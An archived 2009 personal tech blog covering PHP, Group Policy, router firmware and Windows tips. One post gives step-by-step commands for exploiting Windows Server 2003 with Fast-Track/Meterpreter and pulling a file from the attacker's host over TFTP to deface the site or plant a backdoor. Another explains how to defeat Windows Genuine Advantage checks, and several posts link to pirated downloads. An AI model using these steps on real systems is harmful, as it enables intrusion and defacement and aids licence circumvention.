Friday, December 18, 2009

php NOTICE and DEPRECATED wamp server errors

to fix this on the wamp server or others that have PHP
locate this line in php.ini file:
error_reporting = E_ALL

change it to this line:
error_reporting = E_ALL & ~E_NOTICE & ~E_DEPRECATED

Monday, December 7, 2009

how to hack windows server 2003 or xp systems

For those not farmiar with hacking, it is a concept of exploration and education.
This post is for educational purposes only and this bug has been patched by latest Microsoft patches.

A great hacking/exploration tool is called backtrack which is a linux distribution but more on that later...

Found a great video to get started: watch the video:

Basic instructions drawn for this and other videos - in this example; getting into the system with the purpose of adding a webpage to the target (in this case windows server 2003):

1. Log in to backtrack (startx for gui)
2. Start fast-track and choose exploit, enter IP and choose bind.
3. If there are sessions after the attack attempts then type:
sessions -i 1

Basic syntax:
sessions -i ID

4. To get to shell from meterpreter type:
execute -f cmd.exe -c -H -i

5. In another shell start BT tftp service, put your file to /tmp

6. Then get the file from the remote host (BT) in shell via tftp:
tftp -i get /tmp/index.htm c:\inetpub\wwwroot\index.htm


Note: it turns out that windows server 2003 service pack 1 and up has disabled tftp. So only SP0 will allow this trick. If you encounter those servers you must use another method or start tftp in some manner to transfer the backdoor or whatever you want. In my case I simply used echo to type a sample text into a file created by the command, I called index.html

Remember to be a White hat hacker and let me know how it goes!

Thursday, December 3, 2009

Hide IE8 address bar - leaving back, forward, stop and print buttons

Please purchase the instructions for $4.99USD  (a value of over $100 for Microsoft support) :

1. Get the scripts and icon files for each function e.g. back.html and back.ico (get it here [Download]).
2. Place these in C:\IENav -- make new folder on C drive called IENav
3. Custom reg key to add launch paths and register the guid of the API's for these controls. IE8 with nav controls.txt [View or Download]

4. Run/Merge the custom reg file to add controls to the registry. (Does not require a reboot) Once done open IE7-8 and the Address Bar should now be hidden with the new navigation controls placed on the command bar.
I've renamed the vb and reg files with a txt extension so there aren't any issues with firewalls etc. You will just need to remove the .txt extension.

The icon, html and/or javascript files should all reside in your own folder called IENav and should sit directly under C:\ drive. (See Toolbar.vbs or Toolbar.reg).

If you wish to change this location then you will need to edit the Toolbar.vbs or Toolbar.reg (Whichever option you choose) to point to the new location.

The files (first download above) are for IE7 users however IE8 users can still use these files but will need to rename the .js files from .js to .html, e.g refresh.js would become refresh.html.  
You will also need to edit the vb script or reg key (which ever they use) and change any reference to .js to .html.

[Update Nov. 2011] if you would like to also add print and stop buttons download (mirror)

If you have questions or comments you can leave them below or email to theborisedu at gmail dot com
[Special thanks to Scott Alchin (salchin1 at exemail dot com dot au), read my "how to lock down internet explorer 8 with GPO registry" instructions/article and contributed the instructions above]

Friday, November 6, 2009

If it ain't broke, take it apart and fix it.

I gotta make this quick for now so here is what I've been looking at instead of doing school projects....

The famous saying: "if it ain't broke don't fix it" has to be changed to a more appropriate "If it ain't broke, take it apart and fix it" :)

I found this on a T-shirt while browsing the net, this started when I was reading up on my router firmware (gargoyle) and updating to a new beta (version 1.1.1. experimental) as well as looking at information which referenced me to an interesting blog.

'I void warranties' is ironically also the title of that blog and T-shirt I linked to earlier but I got to the tshirt initially from looking at the post about sysadminday which then linked to gift ideas at thinkgeek.

That should cover my day of surfing the interweb and hopefully conclude it by finishing the assignments I am looking forward to forgetting about already...

Tuesday, September 1, 2009

how to apply group policy only to specific computers in domain

I have been searching a lot for this and there was no clear answer anywhere, most links inspired some thought and helped me test out but nothing was really specific enough so I hope this will help.

In order to apply gpo to specific computers with the same users there must be two main steps done:
1. Create an Organizational Unit for the specific computers AND
2. Create a Global Security Group for the computers

OU named "pcOU1" will contain "pc01" computer object and group named "pcSecurityGroup1" inside the OU ("pcOU1") will contain "pc01" as a member (enable computers under object type when adding the members).

Assuming this is done correctly, now set up the group policy from the group policy management (free to download and install with windows server 2003). Create the GPO inside the OU ("pcSecurityGroup1" in this example) and add the security group containing the specific computers you want affected by the policy ("pcSecurityGroup1" in the example) to the security filtering section in group policy managment.

Now modify the policy how ever you need and set the GPO to enforcing if there are other GPOs affecting the same user(s) on the rest of the computers or others for that matter.

Hope that is clear enough, leave a comment if this was helpful or clarification needed or any other comments.

Sunday, August 16, 2009

how to lock down internet explorer 8 with GPO registry

Please purchase these instructions for $4.99 USD here (a value of over $100 for Microsoft support) :

In my search to lock down internet explorer 8 with group policy objects through registry entries I have found the following techniques work best:

1. You may want use the default settings from IE8 group policy objects available (this wasn't sufficient for me) to do that you need to download and save the install file of IE8 from IE installer website, open the file with winrar or 7zip then find and extract the following file: inetres.adm into your desktop or my documents or the default template location (C:\WINDOWS\inf). Now load it using my instructions on the bottom of this post.

The default settings might work fine for removing the options menu, status bar and such but there were two more things I need that were not there. I searched high and low for the following tasks:
  • Hide/remove/disable address bar
  • Hide/remove/disable favourites and the command bar

I finally found them and will show you the registry changes first and then how to put it together into an adm template, which can be added to your group policy editor and modified from there. (Instructions for that are found at the bottom of this post)

  • To remove/hide the address bar the following registry change must be made:

HKEY_Current_USER\software\policies\microsoft\internet explorer\toolbars\restrictions
Value name: NoNavBar
Value: 1 (on)

  • To remove/hide the command bar (includes favourites), this registry change must be made:

HKEY_Current_USER\software\policies\microsoft\internet explorer\toolbars\restrictions
Value name: NoCommandBar
Value: 1 (on)

create a new notepad text file/or open notepad and copy+past the following
class user

category IESettings

policy "disable/hide IE command bar"
keyname "software\policies\microsoft\internet explorer\toolbars\restrictions"
explain "here is the explaination"
valuename "NoCommandBar"
valueon numeric 1
valueoff numeric 0
end policy

policy "disable/hide IE nav bar"
keyname "Software\Policies\Microsoft\Internet Explorer\Toolbars\Restrictions"
explain "here is the explaination"
valuename "NoNavBar"
valueon numeric 1
valueoff numeric 0
end policy

end category

Make sure to add this blank space at the bottom of the file (ask MS why this is, I just know the gpo editor won't accept it otherwise)

Save it as NAME.adm (remove the .txt) where NAME is what you would like to name it i.e removeaddressbar.adm (doesn't make any difference)

Now to add the file to gpo editor user the instructions at the bottom of THIS POST.

Once that is done you will see it under IESettings, enable the nessary objects for you and replicate the changes (Go to Start>Run>cmd and type "gpupdate /force" to speed things up)

This works for me but as we know with different environments and settings so let me know if you have problems!

Enjoy and good luck!

P.S. If you would like to leave the back, forward and refresh buttons follow this post

Sunday, August 9, 2009

Gargoyle router for bandwidth limiting / cap linksys wrt54g

Not as bad as it sounds. Actually this firmware wins me over the best right now!

Gargoyle is based on openwrt, in fact if you have it installed gargoyle is just a package install away!

Basically what i love about this firmware most is that it allows me to STOP [Update: now you can throttle it to slow it down after the cap is reached!] internet traffic when i reach my bandwidth cap (rogers allows me 60GB a month at the moment)

but that is definitely not the only feature, it's also great with other features you would expect from a good firmware, like; QoS and live bandwidth display and monitoring, port forwarding, iptables and ssh with your usual Linux commands normally provided in the busybox system on these types of firmware, as well as the dnsmasq and other packages that are typical in this firmware distros (ie.e dd-wrt, tomato) .

It had some drawbacks as you can expect, but they are fixed and patched as the firmware is actively being developed you can track versions and fixes provided. New features and addition to previous ones so always be on the lookout for new updates on the main site.

in this post i talked about tomato and sure it is great with neat features (which mostly gargoyle has) including javascript, ajax, svg bandwidth graphs, QoS - but the major feature that i was looking for and could not figure out how to do (i have extensive Linux knowledge, which is what these firmwares are based on... just look in the blog - and take my word for it * ) which was to stop my internet when my cap is reached, when you go over - you pay extra;

i used a lot of bandwidth recently and found that only 5 extra GB cost as much as $12 which might not sound like much but looking at my history from before the new caps i quickly found this project on my hands...

*of course i suspect there is a way to do this with lots of scripts but it just isn't what i am used to, can't save scripts except for the gui, nor is there much if any documentation; found a bandwidth statistic backup script which didn't work... go figure reverse engineering these things... much too complex to try to do, i should hope they will have this in the future in which point i will be glad to switch back to tomato because it still wins the graphics and usability [maybe stability too] of most things but for now it was just easier to implement gargoyle for my needs...

But I am open to any custom scripts or implementations of tomato that anyone may have out there, feel free to send them my way and i will test it out!

so for those American users with 200gb or 250gb cap from Comcast or Time Warner (which is a heck of a lot more than what we Canadians get!) - i found posts while searching for a solution and seems they were searching for one also, well for the time being, this is your match.

to update to gargoyle: use the .bin if your upgrading from the default Linksys firmware or .trx files when upgrading from tomato or dd-wrt (or any other third party firmware except for openwrt) but make sure to read the documentation - it is well documented for what seems like a small but growing project

so install and enjoy the benefits!!!

P.S. I forgot to post this before but the first few months after installing the initial versions (new ones are even much better now) I can confirm that the bandwidth is very accurate. From my research which composed of taking daily Mb usage from the router and comparing to my ISP's Mb usage (from the self service interface) the results are great, although not 100% I would put it at 99.9% which is excellent
So it is very safe to use and with the new throttling instead of internet stopping once the quote is reached you have a great service that is unmatched.

And I use the web interface as a quick check on much percent is currently taken which is way faster if anyone knows how slow login into rogers is :)

(Updated Sep. 1 2010)

Friday, July 31, 2009

how to remove genuine microsoft software warning

Following these sites instructions but they forgot a crucial step.

1. Lauch Windows Task Manager.
2. End wgatray.exe process in Task Manager. << at this point it will just start again!
to stop it, locate and right click on the wgatray.exe file (under

A. go to properties > security tab > advanced

B. now uncheck "allow inheritable permissions from the parent..." you will be asked to remove or copy, choose Remove > click "Yes" and OK to close the window now you can end the proccess and it should not start up again.

C. Next you will need to give admin permissions to delete the file
right click wgatray.exe > go to properties > security tab > click Add > type administrators and click OK and OK again.

3. Delete WgaTray.exe from c:\Windows\System32.
4. Delete WgaTray.exe from c:\Windows\System32\dllcache.
5. Lauch RegEdit. (open run box and type regedit)
6. Browse to the following location:
7. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
9. Delete the folder ‘WgaLogon’ and all its contents
10. Reboot Windows XP.


Warren Buffett MBA Talk rapidshare download

Warren Buffett needs no introduction, a speech he did at Florida university.
best played with VLC or other flv players.

(it's flv but renamed to avi file)

Thursday, July 30, 2009

how to get show desktop icon in the quick launch windows xp

To get the "show Desktop" icon to display in the quick launch download the shortcut and place it in "C:\Documents and Settings\USERNAME\Application Data\Microsoft\Internet Explorer\Quick Launch"

if you would like it to show for all users then place it in "C:\Documents and Settings\All Users\Application Data\Microsoft\Internet Explorer\Quick Launch"

Saturday, July 18, 2009

The Spoken Word Revolution rapidshare download free

Spoken word is a form of literary art or artistic performance in which lyrics, poetry, or stories are spoken rather than sung. [Wikipedia]

There is an interesting book called "The spoken word revolution (slam, hip hop & the poetry of a new generation)" and it includes a CD which I happened to find floating around the internet.

"hear over 70 minutes of electrifying live poetry on 1 audio CD -- including Saul Williams, Patricia Smith, Viggo Mortensen and many more..." 1 audio CD

download here (alternative link)

Monday, May 4, 2009

More marijuana research

As with the previous research this one is from an official medical book - this time I happened to find the hard copy (unlike the ebook last time)

It covers the following topics:
  • Prevalence of marijuana
  • Acute and chronic marijuana intoxication
  • Physical effects of marijuana
  • Tolerance and physical dependence
  • Withdrawal signs and symptoms

The actual text can be found HERE

Isselbacher, Kurt J., et al. Harrison's Principles of internal medicine. Vol. 2. 13th ed.
United States of America: McGraw-Hill, 1994. 2431-2.

Friday, April 17, 2009

Lock down windows xp clients with windows server 2003

This took me a bunch of research so here is what I found worked best; after locking down the clients with a group policy object for the user's OU (do not modify default group policy) there were a few more things I wanted to do:
  • Disable right-click on desktop (start menu and task bar already disabled with policy)
  • Remove/hide Control Panel icon (but not all control panel functions - Date and time allowed for the specific application)
  • Remove/hide Printers and Faxes (no need for any printing anyway but group policy didn't have the option to do so)
First thing I had to find out is the registry keys for these tasks which are as follows:

Disable or remove right click ability - set to 1:

Remove/hide Control Panel icon - set to 0:

Remove/hide Printers and Faxes - set to 0:

Next I need to push it to the systems via group policy, this was probably the trickiest part but turned out to be fairly simple as well. Create a new text file and type the following: (without =)
class user

category MySettings

policy "disable right click"
keyname "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
explain "here is the explaination"
valuename "NoViewContextMenu"
valueon 1
valueoff 0
end policy

policy "hide printers and faxes from start menu"
keyname "Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
explain "here is the explaination"
valuename "start_showprinters"
valueon NUMERIC 0
valueoff NUMERIC 1
end policy

policy "hide control panel from start menu"
keyname "Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
explain "here is the explaination"
valuename "start_showcontrolpanel"
valueon NUMERIC 0
valueoff NUMERIC 1
end policy

end category

Save this and rename the file to something.adm. Now under the policy editor of the policy you would like to apply these right click on Administrative Template and click Add/remove templates now browse to the folder you saved the .adm file and load it in. Finally choose enable on the policies which will be under user settings>MySettings in this example, refresh the policy (gpupdate), log off and log back in with the target users and your done!

They should now have no right click functionality on the desktop, no control panel (but still date and time granted - check this by double clicking the system clock; if it opens the time and date properties then it is good) and no Printers and faxes so the system is locked.

Let me know if it's clear enough!

Monday, March 30, 2009

Start network eth0 dhcp on bootup

Ran into a problem, the only interface going up was the loopback, after some research and testing found out that I had to add the following lines to /etc/sysconfig/network-scripts/ifcfg-eth0

Not sure if they have to be in any particular location within the file but my exact file looks like this:
# Name of card.....................

Then just reboot and enjoy!

(reboot or init 6)

Putty fix on windows

I had some annoyance with putty on my windows systems; I always forget where it downloads, or i moved it and the shortcut wouldn't work but the program actually saves keys in registry so it doesn't really matter where it is located...

So finally I decided to place it in C:\WINDOWS\system32 and run it by pressing windowskey+r to get to the run box and type "putty" without quotes (because anything in system32 with .exe will run from run box)

One more thing I have done since then is create a one line batch file to go with putty download in order to place it in system32 everytime installing it in a new system.
The one line is the following:
move putty.exe C:\WINDOWS\system32\putty.exe

Save that in text file and rename it to something.bat with putty.exe in same folder and run the batch.
Or just download it both from HERE

How to get SSH connection from remote networks

From my original reply to post:

Remote SSH to VMware
Dec 10, 2008 12:34 PM
drummingfool (3 posts since Dec 10, 2008)

Here's my issue:

I have set up vmware running CentOS 5.2 on a vista host machine. I would like to remote SSH into my centos from anywhere. I can ssh into centos locally from the host box, but not remotely. I assume this has something to do with port forwarding. I am running straight into a modem from the host box and therefore do not have direct port forwarding. I can also VNC into the host machine remotely. Also the windows firewall is off, as well as all firewall options on centos.

Someone help! having to vnc into the host box and then use vm is getting painfully slow. Any ideas?

----------------------------------other replies cut---------------------------------------------

Re: Remote SSH to VMware Mar 5, 2009 12:14 PM
in response to: drummingfool
bplotkin (1 posts since Mar 5, 2009)
Reply 4. Re: Remote SSH to VMware Mar 5, 2009 12:14 PM
in response to: drummingfool

You will need to enable ssh for external networks.

Open /etc/hosts.allow ( something like $vi /etc/hosts.allow) and add the following line at the bottom:

or even easier type at the prompt
echo "SSHD: ALL" >> /etc/hosts.allow

This will allow all external networks to connect to the SSH service.
otherwise you can put an IP or a range of IPs to have a more secure system (google hosts allow for more information).

Sunday, March 29, 2009

Good router

Just tried out the WRT54GL from Linksys and I must say that it's just great.

UPDATE [March 2011]: if you are looking for more flash, ram and wireless N try the very cost effective:
TP-Link TL-WR741ND or a little better 
TP-Link TL-WR1043ND or one of the best available
Buffalo WZR-HP-G300NH with great specs, perfect for small business

For anyone who doesn't know, it is an open source firmware version from Linksys; which means you can change from the default routing admin interface (and features) - in which case this opens up for some amazing possibilities.

I choose the tomato firmware (just google for any others) and it just amazes me how much things get better when opening up the source code to regular people - communities form to improve software!

The major features I love are:
  • Bandwidth monitoring (as my local ISP has monthly limits),
  • QoS (Quality of Service) - which means downloading/uploading (things like bittorrents or moving large files) won't interrupt regular browsing on any computer connected,
  • SSH service is great for me because I don't have to run another Linux box or vmware just for it,
  • And finally it can also be used as a wireless bridge to connect off of existing wireless networks or to extend the range (but I havn't tried that yet so comment below if you have!).

It is really simple to upgrade:
1. Download the file Tomato_1_23.7z (or newest version) and unzip the folder
2. Log in to the Linksys firmware (Wired) at (blank username, admin for password)
3. Click the Administration tab, then Firmware Upgrade.
4. Upload the WRT54G_WRT54GL.bin file - DO NOT Sneaze! this must complete without power or network interruptions, so it's best to wait patiently.
5. Wait to be prompted then enter root for username and admin for password (you should change that after logon)

Now for my favorite features (so far):
  • Bandwidth monitoring is enabled by default
  • Enable the QoS: click the QoS button on the left > check the Enable checkbox and click save.
  • SSH is enabled ineternally and can also be enabled for external networks but isn't recommended for begginers.
  • To change the wireless functions go to Basic > Network > choose Wireless Ethernet Bridge from the drop down menu of wireless section and click Save then you can click on Wireless Survey and connect to available networks.
Notice how saving settings does not restart the router as with most default firmware!


Sunday, March 22, 2009

How to restore iphone from 3.0 to 2.2.1

A friend of mine had recently spent 5 hours trying to find the solution which was no where on the web, so for those of you still trying to figure this out here it is:

Put your iPhone in DFU mode

1. Open Up iTunes

2. Have Your iPhone Connected To Your Pc

3. Hold Down The Power/Sleep Button And The Home Button For Exactly 10 Seconds.

4. Then Release The Power/Sleep Button And Continue To Hold The Home Button Until iTunes Brings Up A Message Saying Your iPhone Is In DFU Mode.

5. Click Ok Or Whatever It Is So That It Closes That Popup.

6. Hold Shift Then Click Restore.

7.Then Make sure You Have Downloaded the ISPW Firmware. Called:

8. Let It Restore Once Its Finished You Will Get An Error Thats Normal It Will Most Likely Be 1015 Or Something Like That.

9. Download Quick Pwn 2.2.1.

*These steps are very important!

10. Then Open Up Quick Pwn With Your iPhone Connected To Your PC And It will then Say That You Need To Hold The Power/Sleep Button And The Home button For Exactly 15 Seconds Then Release The Power/Sleep Button And Continue To Hold The Home Button For 2 Seconds. This will boot your iPhone To the Emergency Call screen.

11.Open up iTunes And Let It Activate Your iPhone.

12. Then Restore your iPhone From A Previous Backup If you Have One.

Wednesday, February 18, 2009

Marijuana Research

Came across this interesting marijuana documentary some time back and decided to see what truth is in it; recently found this interesting publication from the US government called "Marijuana and Health - Report of a Study by a Committee of the INSTITUTE OF MEDICINE Division of Health Sciences Policy NATIONAL ACADEMY PRESS Washington, D.C. 1982"

Many interesting points brought up in this study from 1980's including:

and more.

PDF download, for text version also found on google books but more organized and summarized version will be presented here soon.

For "The union: the business behind getting high" please leave a comment if you found places to purchase it (like this Amazon UK link), otherwise about the topic or any general opinions or criticism are welcome.

Another, newer, research I made can be found HERE
Thanks for visiting my blog :)

Wednesday, February 4, 2009

How to read or modify Microsoft Office 2007 documents

This has been a big issue with the new Microsoft office 2007 software since day 1, new format that is not backwards compatible leaving both users of the new software and old software confused and frustrated. The main issue has been with the xml formats as Microsoft claims has new features; docx, xlsx, pptx, etc. from the original doc, xls, ppt which has been around since at least 1997...

Finally, a download has become available from Microsoft to put a small fix on the problem.

This is like an add-on to your current MS office suit (tested with 2003 so far, let me know if works with xp/2000 in the comments) which basically converts the MS 2007 documents into something readable, the neat feature thogh is that you can still save it as 2007 format (without the new features of course).

Enjoy proprietary freedom in all it's glory

Sunday, January 18, 2009

How to shutdown torrent client remotly

I have experimented and implemented a simple method to shutdown my torrent client (uTorrent) in order to have faster internet speed on other computers without having to remote connect or physically go to the computer to shut it down.

It is as simple as typing the following into notepad and saving as a bat script:
taskkill /s \\boris /u boris /p 123 /f /im "utorrent.exe" /t

To explain what is going on here:
/s (system) \\domain -of the client
/u (user) username on the domain
/p (password) the password of the above user
/f force
/im executable program
/t tree of programs under it (child process) -seems to be necessary for shutting down uTorrent

once this is set up properly it can be run on the same network as your client and it will be shutdown to improve internet speed!

Note: be ware that the program does not shutdown properly and will check the downloading files next time the program is ran, if you're like me and don't mind this over faster internet connection when needed then you will enjoy this trick :)
Available for download HERE

Tuesday, January 13, 2009

Basics of Log Me In

Log Me In is a very powerful free web based application that is used for remote log in to desktops.

The basic installation is very simple to do, the only pre-installation requirements that Java is installed on each computer (including the one you are logging in from).

Once created a free account on the website, click "Add computer" on the computer you would like to log into from anywhere in the world (with an internet connection). Then choose the free edition, unless you would like the other version's which you may need to pay for. Now all is left to do is wait for the download and follow the on screen installation instructions.

Once complete you will be able to log into that computer from any internet connection preferably with firefox and java already installed, I would also suggest to install the firefox add-on which is prompted when connecting to your computer if possible.

Keep in mind that if someone is sitting on the computer you are logging into they will see what you do unless you check off "Blank screen" from the options. This can be useful if you are helping someone but not if you are checking some personal files or emails...

BTW happy new years everyone!